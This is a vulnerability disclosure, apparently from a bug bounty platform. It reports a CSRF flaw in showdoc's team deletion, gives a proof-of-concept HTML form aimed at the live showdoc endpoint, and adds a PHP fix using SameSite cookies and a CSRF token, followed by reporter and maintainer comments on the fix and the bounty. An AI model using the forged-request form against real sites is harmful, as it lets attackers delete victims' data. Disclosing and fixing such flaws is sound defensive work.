Cross-Site Request Forgery (CSRF) in star7th/showdoc
Reported on
Nov 21st 2021
Description
You set the strict flag only on one of your cookies, the one named cookie_token, but in Team management an attacker can still delete or add teams through a CSRF vulnerability because the cookie named PHPSESSID does not have the strict flag.
Proof of Concept
1. Replace 38046 with the team id.
2. Open poc.html and click on the submit button.
3. After that, the team with id 38046 (or your replaced team id) will be deleted.
<!-- poc.html -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
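As an added illustration of the fix side (this is not showdoc's code), the PHP below issues PHPSESSID with SameSite=Strict before the session starts, rotates the session id at login, and adds a per-session CSRF token check on the delete action as defence in depth; the endpoint name and the `id` field come from the report, while `onLoginSuccess`, `handleTeamDelete` and the commented-out `deleteTeam` helper are hypothetical names.

```php
<?php
// Added example, not showdoc's code. Hardens the session cookie that the
// report shows being sent on a cross-site POST to s=/api/team/delete.

// Weak behaviour: calling session_start() with default settings issues
// PHPSESSID without a SameSite attribute, so the attacker's form post
// carries it and the delete succeeds.

// Hardened: set the cookie attributes before the session starts (PHP 7.3+).
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'domain'   => '',
    'secure'   => true,      // only sent over HTTPS
    'httponly' => true,      // not readable from JavaScript
    'samesite' => 'Strict',  // not sent on cross-site requests
]);
session_start();

// Hypothetical login hook: rotate the session id so a PHPSESSID issued
// before login (or with the old attributes) stops being valid, and mint
// a CSRF token the attacker's page cannot read.
function onLoginSuccess(): void
{
    session_regenerate_id(true);
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Constant-time comparison of the submitted token with the session's.
function csrfTokenIsValid(array $post): bool
{
    return isset($_SESSION['csrf_token'], $post['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

// Hypothetical handler for the team delete action; returns the HTTP status.
function handleTeamDelete(array $post): int
{
    if (!csrfTokenIsValid($post)) {
        http_response_code(403);
        return 403;            // the PoC form has no token, so it stops here
    }
    $teamId = (int) ($post['id'] ?? 0);
    // deleteTeam($teamId);    // application-specific, not shown
    return 200;
}
```

SameSite=Strict alone blocks the PoC only in browsers that honour the attribute, which is why the token check stays in place.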
Hey chen,
Not fixed, and just like before (I logged out of the system and logged in again).
This is a fix commit that has a good fix for strict cookies:
https://github.com/devcode-it/openstamanager/blob/402dca9162a84cf7617a8bbd582aa9ad51259016/core.php#L58
@amammad 👋 it looks like a bug on our side caused the disclosure bounty to be set to $155. We have reset it to the value displayed at disclosure ($64). Apologies for the confusion or inconvenience.
@amammad You can close the browser and open it again. Because the previous phpsessid was automatically maintained by the program, you need to restart the browser to invalidate it. If you log in again, the phpsessid is not regenerated.